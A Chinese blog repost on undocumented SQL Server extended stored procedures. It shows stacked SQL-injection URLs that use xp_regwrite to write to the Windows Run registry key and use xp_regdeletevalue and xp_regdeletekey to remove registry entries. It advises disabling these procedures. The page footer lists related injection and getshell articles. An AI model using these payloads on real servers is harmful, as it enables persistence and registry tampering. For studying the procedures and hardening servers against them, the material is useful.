SQL Server中未公布的扩展存储过程注入

最新推荐文章于 2024-07-26 15:16:21 发布
最新推荐文章于 2024-07-26 15:16:21 发布
阅读量76 收藏
点赞数
文章标签: 操作系统
原文链接:https://yq.aliyun.com/articles/467618
版权

 SQL Server中未公布的扩展存储过程注入
很多人也许并不了解,在SQL Server中包含了几个可以访问系统注册表的扩展存储过程。但实际上这几个扩展存储过程都是未公开的,从SQL Server 7.0就有了,在SQL server 2000中仍然保留,他们以后可能会删除.但是这几个存储过程却提供了在当前的SQL Server版本中访问系统注册表的能力,

而且很多人利用SQL Server来进行攻击系统时,往往都会用到这几个扩展存储过程.所以最好在SQL Server中禁用他们。

假如http://127.0.0.1/view.asp?id=165存在SQL Server的sql注入,我们可以用xp_regwrite写入注册表。

使用方法:


xp_regwrite 根键,子键, 值名, 值类型, 值 
http://127.0.0.1/view.asp?id=165; exec 
master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','
SOFTWARE/Microsoft/Windows/CurrentVersion/run','
TestValueName','reg_sz','hello'


注释:值类型有两种REG_SZ 表示字符型,REG_DWORD 表示整型(用xp_regdeletevalue删除某个值)。

使用方法:


xp_regdeletevalue 根键,子键,值名 
http://127.0.0.1/view.asp?id=165; exec master.
xp_regdeletevalue 'HKEY_LOCAL_MACHINE','
SOFTWARE/Microsoft/Windows/CurrentVersion','TestValueName'

xp_regdeletekey 删除键,包括该键下所有值


使用方法:


http://127.0.0.1/view.asp?id=165; exec 
master.xp_regdeletekey 'HKEY_LOCAL_MACHINE','
SOFTWARE/Microsoft/Windows/CurrentVersion/Testkey'


本文转自yonghu86 51CTO博客,原文链接:http://blog.51cto.com/yonghu/1321470,如需转载请自行联系原作者

weixin_34301132
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL Server下几个危险的扩展存储过程
09-14
然而,这也带来了安全隐患,特别是那些具有较高权限的扩展存储过程,如在描述中提到的,可能会被恶意用户利用进行SQL注入攻击。 SQL注入是一种常见的安全漏洞,攻击者通过输入恶意SQL代码来获取未经授权的数据访问...
SQL Server中视图,存储过程注入
12-14
SQL Server中,视图、存储过程SQL注入是数据库管理中的重要概念,它们各自扮演着不同的角色,有助于提升数据库的安全性和效率。 一、视图 1. 视图的概念: 视图是从一个或多个表中导出的虚拟表,它不存储实际...
防止sql注入存储过程
meiqingsong的专栏
04-08 3263
-- Function: fn_escapecmdshellstring-- Description: Returns an escaped version of a given string--              with carets (^) added in front of all the special --              command shell symbol
Sql Server存储过程注入攻击
heartrude的专栏
04-02 4620
所谓Sql注入,就是利用动态构建Sql语句的操作,在输入参中增加额外sql信息从而在执行该操作时顺带进行 额外的地数据库操作的攻击方式。 使用存储过程可以很大程度上避免Sql注入攻击,但是并不能避免Sql注入功能。只要存在Sql语句动态生成, 而传入参包括字符串,就可以产生Sql注入。 目前在存储过程中需要进行Sql语句动态生成的基本是因为条件语句的动态形成
SQLSERVER注入问题
qq_44790964的博客
10-14 628
Mssql数据库调用分析 Mssql注入原理 Mssql注入另类玩法 asp 一般和access搭的比较多一些 aspx一般和sqlserver搭的比较多 Mssql介绍美国微软公司推出的一种关系型数据库系统.sqlserver是一个可扩展的,高性能的,为公布式客户机 服务器计算机所设计的数据库管理系统,实现了与windowsnt的有机结合,提供了基于事务的企业级信息管理系统方案 其特如下 ...
SQL Server中未公布扩展存储过程
jackmacro的专栏
03-09 610
<br />虽然大多数人而言并不熟悉,但在SQL Server中包含了几个可以访问系统注册表的扩展存储过程。但实际上这几个扩展存储过程都是未公开的,从SQL Server 7.0就有了,在SQL server 2000中仍然保留,他们以后可能会删除。但是这几个存储过程却提供了在当前的SQL Server版本中访问系统注册表的能力,而且很多人利用SQL Server来进行攻击系统时,往往都会用到这几个扩展存储过程,所以最好在SQL Server中禁用他们。<br />  假如http://127.0.0.1/
编写安全的SQL Server扩展存储过程
03-04
编写安全的SQL Server扩展存储过程是至关重要的,因为它们在SQL Server的地址空间内运行,直接影响到数据库系统的稳定性和安全性。 扩展存储过程的关键在于理解它们如何与SQL Server执行环境交互。由于DLL在SQL ...
一些SQL Server存储过程参数及例子
09-14
SQL Server的不同版本中,存在数百个内置的存储过程,其中一部分已由Microsoft文档化,但仍有大量存储过程未被记录。这些未记录的存储过程可能在SQL Server 2000的Enterprise Manager GUI中使用,不推荐在其他进程...
sqlserver 千万数量级分页存储过程代码
09-11
存储过程`[dbo].[SP_Pagination]`是专为处理大数据量的分页查询而设计的,尤其适用于SQL Server数据库中的千万数量级的数据。它允许用户高效地获取指定页码的数据,同时优化了性能,避免了全表扫描对数据库性能的...
24.注入篇————Sql server数据库注入
Fly_鹏程万里
03-03 3015
前言攻击者对于数据库注入,无非是想利用数据库获取更多的数据或者更大的权限,那么利用方式可以归纳为以下几种:查询数据读写文件执行命令利用错误消息提取信息Sql server数据库是一个非常优秀的数据库,它可以准确地定位错误消息,对开发人员来说来说,这是一件十分美好的事情,对攻击者来说也是一件十分美好的事情,因为攻击者可以通过错误消息提取数据。(1)枚举当前表及列查询root用户的详细信息,SQL语句...
怎么select一个存储过程的结果 sqlserver_SQL server手工注入入门
weixin_39798031的博客
12-03 648
目录0x01 SQL server基础0x02 基本注入SQL server部分版本已被黑客安装后门,详情请在文末查看。0x01 SQL server基础在学习注入之前,最重要的是要先了解SQL server的具体的东西,才能更好的进行注入操作系统库mastermaster数据库控制SQLserver的所有方面,这个数据库中包含所有的配置信息、用户登陆信息、当前正在服务器运行中的过程的信息mode...
SQLServer数据库注入详解
热门推荐
谢公子的博客
06-28 2万+
目录 SQLServer数据库 修改默认1433端口 SQLServer数据库的管理 SQLServer数据库的查询语句 SA权限开启xp_cmdshell获取主机权限 SA权限使用sp_oacreate执行系统命令 DB_owner权限LOG备份Getshell DB_owner权限差异备份Getshell 盲注SQLServer数据库 SQLServer数据库 SQL S...
Linux网络工具“瑞士军刀“集合
分享不一样的技术,与你一起共同成长!
07-26 313
下面结合之前的一些使用经验为大家介绍一下一些经典应用场景下,这个网络命令工具如何使用的。例如怎么查看当前服务器监听哪些端口、连接目标主机端口情况如何?平常我们在进行Linux服务器相关运维的时候,总会遇到一些网络相关的问题。我们可以借助这些小巧、功能强悍的工具帮助我们排查问题、解决问题...
Linux 三剑客之 grep
最新发布
Tallbo的博客
07-26 808
grep 是 Linux 中用于文本搜索的强大工具,可以在文件中搜索指定的模式,并输出包含该模式的行。
基于宝塔的 Bytebase 可视化安装、配置、部署教程
Bytebase的博客
07-26 380
Bytebase是一款使用Go语言开发的开源数据库管理软件,旨在为DBA(数据库管理员)、开发人员和平台工程师提供一个基于Web的协作工作区,用于管理数据库的整个生命周期。本文将介绍如何在宝塔面板上可视化安装、部署、配置Bytebase教程。
SQLSERVER存储过程详解与示例
SQL SERVER中创建存储过程使用CREATE PROCEDURE语句,例如给出的小例子展示了创建一个名为`query_book`的存储过程,用于查询`book`表的所有数据。调用存储过程则使用EXEC关键字,如`exec query_book`。 存储过程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值